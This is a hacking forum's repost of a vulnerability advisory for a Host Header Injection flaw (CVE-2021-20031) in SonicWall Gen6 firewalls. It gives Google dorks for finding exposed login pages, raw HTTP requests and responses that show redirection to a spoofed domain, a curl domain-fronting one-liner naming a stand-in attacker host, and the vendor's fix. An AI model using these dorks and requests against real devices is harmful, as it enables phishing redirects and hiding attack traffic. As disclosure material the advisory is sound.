跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Sonicwall SonicOS 7.0 - Host Header Injection

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: Sonicwall SonicOS 7.0 - Host Header Injection
# Google Dork: inurl:"auth.html" intitle:"SonicWall" 
#                        intitle:"SonicWall Analyzer Login"
# Discovered Date: 03/09/2020
# Reported Date: 07/09/2020
# Exploit Author: Ramikan 
# Vendor Homepage:sonicwall.com
# Affected Devices: All SonicWall Next Gen 6 Devices
# Tested On: SonicWall NAS 6.2.5
# Affected Version: All SonicWall Next Gen 6 Devices till 6.5.3
# Fixed Version:Gen6 firmware 6.5.4.8-89n 
# CVE : CVE-2021-20031
# CVSS v3:5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
# Category:Hardware, Web Apps
# Reference : https://github.com/Ramikan/Vulnerabilities/

*************************************************************************************************************************************

Vulnerability 1: Host Header Injection

*************************************************************************************************************************************
Description:
A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages.
An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack

Impact:
Host Header changed to different domain (fakedomain.com).
Fakedomain.com can be found in two lines in the HTTP response, below are the two lines.

var jumpURL = "https://fakedomain.com/auth.html";
ease be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a>

*************************************************************************************************************************************
Normal Request
*************************************************************************************************************************************
GET / HTTP/1.1
Host: 192.168.10.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

*************************************************************************************************************************************
Normal Response
*************************************************************************************************************************************
HTTP/1.0 200 OK
Server: SonicWALL
Expires: -1
Cache-Control: no-cache
Content-type: text/html; charset=UTF-8;
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com;

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
++++++++++++++++++snipped+++++++++++++++++++++++

</head>
<body class="login_bg">
	<div class="login_outer">
		<div class="login_inner">
			<div class="vgap48"></div>
			<div class="login_logo">
				<img src="logo_sw.png">
			</div>
			<div class="login_prodname">
				Network Security Appliance
			</div>
			<div class="vgap48"></div>
			<div class="login_msg_header">
				Please be patient as you are being re-directed to <a href="https://192.168.10.1/auth.html" target="_top">a secure login page</a>
			</div>
			<div class="vgap24"></div>
		</div>
	</div>


</body>
</html>
*************************************************************************************************************************************
POC 
*************************************************************************************************************************************

Host Header changed to different domain (fakedomain.com).
Fakedomain.com can be found in two lines in the response, below are the two lines.

var jumpURL = "https://fakedomain.com/auth.html";
ease be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a>

*************************************************************************************************************************************
Request:
*************************************************************************************************************************************
GET / HTTP/1.1
Host: fakedomain.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Upgrade-Insecure-Requests: 1
Connection: close
Cookie: temp=

*************************************************************************************************************************************
Response:
*************************************************************************************************************************************

HTTP/1.0 200 OK
Server: SonicWALL
Expires: -1
Cache-Control: no-cache
Content-type: text/html; charset=UTF-8;
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com;

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<meta http-equiv="Content-Type" content="text/html">
<title>Document Moved</title>
<meta name="id" content="docJump" >
<link rel=stylesheet href="swl_styles-6.2.5-2464327966.css" TYPE="text/css">
<link rel=stylesheet href="swl_login-6.2.5-2193764341.css" TYPE="text/css">
<script type="text/JavaScript">
var resetSecureFlag = false;
setTimeout("goJump();", 1000);
function goJump() {
	var jumpURL = "https://fakedomain.com/auth.html";
	var jumpProt = jumpURL.substr(0,6).toLowerCase();
	var ix;
	if (jumpProt.substr(0,4) == "http" && (ix = jumpProt.indexOf(":")) != -1) {
		jumpProt = jumpProt.substr(0,ix+1);
		if (location.protocol.toLowerCase() != jumpProt) {
			window.opener = null;
			top.opener = null;
		}
	}
	if (resetSecureFlag) {
		var sessId = getCookie("SessId");
		var pageSeed = swlStore.get("PageSeed", {isGlobal: true});
		if (sessId) { setCookieExt("SessId", sessId, { strictSameSite: true }); }
		if (pageSeed) { swlStore.set("PageSeed", pageSeed, {isGlobal: true}); }
	}
	top.location.href = jumpURL;
}
function setCookie(key, value) {
  var argv = setCookie.arguments;
  var argc = setCookie.arguments.length;
  var expires = (argc > 2) ? argv[2] : null;
  var path = (argc > 3) ? argv[3] : null;
  var domain = (argc > 4) ? argv[4] : null;
  var secure = (argc > 5) ? argv[5] : false;
  document.cookie = key + "=" + escape (value) +
	((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
	((path == null) ? "" : ("; path=" + path)) +
	((domain == null) ? "" : ("; domain=" + domain)) +
	((secure == true) ? "; secure" : "");
}
function getCookie(key) {
	if (document.cookie.length) {
		var cookies = ' ' + document.cookie;
		var start = cookies.indexOf(' ' + key + '=');
		if (start == -1) {
			return null;
		}
		var end = cookies.indexOf(";", start);
		if (end == -1) {
			end = cookies.length;
		}
		end -= start;
		var cookie = cookies.substr(start,end);
		return unescape(cookie.substr(cookie.indexOf('=') + 1, cookie.length - cookie.indexOf('=') + 1));
	} else {
		return null;
	}
}
</script>

</head>
<body class="login_bg">
	<div class="login_outer">
		<div class="login_inner">
			<div class="vgap48"></div>
			<div class="login_logo">
				<img src="logo_sw.png">
			</div>
			<div class="login_prodname">
				Network Security Appliance
			</div>
			<div class="vgap48"></div>
			<div class="login_msg_header">
				Please be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a>
			</div>
			<div class="vgap24"></div>
		</div>
	</div>


</body>
</html>

The redirection is happening to https://fakedomain.com/auth.html.

*************************************************************************************************************************************
Attack Vector:
*************************************************************************************************************************************
Can be used for domain fronting.

curl -k --header "Host: attack.host.net" "Domain Name of the Sonicwall device"


*************************************************************************************************************************************
Vendor Response:
*************************************************************************************************************************************
Fix: SonicWall has fixed the issue in Gen6 firmware 6.5.4.8-89n (build is available in mysonicwall.com) -  fix is provided with a CLI option > configure > administration > enforce-http-host-check,  to avoid Host header redirection.
Workaround: Please disable port 80 to mitigate it and this issue affected all Gen6 firewall products.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019
*************************************************************************************************************************************

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。